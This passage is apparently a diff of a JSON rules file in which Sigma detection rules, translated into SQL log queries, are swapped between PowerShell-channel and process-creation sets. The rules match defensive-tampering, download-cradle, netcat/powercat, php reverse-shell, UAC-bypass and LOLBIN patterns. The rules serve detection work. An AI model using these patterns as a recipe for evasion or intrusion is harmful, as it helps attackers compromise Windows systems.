Or set default actions to allow.", - "author": "frack113", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR 
((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Other scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", + "title": "Files And Subdirectories Listing Using Dir", + "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "description": "Detects usage of the \"dir\" command that's part of windows 
batch/cmd to collect information about directories", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_cmd_dir_execution.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' 
AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Renamed Powershell Under Powershell Channel", - "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects renamed powershell", - "author": "Harish Segar, frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_renamed_powershell.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": 
"frack113", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "status": "test", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start 
a network capture", + "author": "Kutepov Anton, oscd.community", + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml" + }, + { + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' 
ESCAPE '\\')" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": 
"Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.defense_evasion", + "attack.command_and_control", + "attack.execution", + "attack.t1105", "attack.t1218" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate use of the library" 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" 
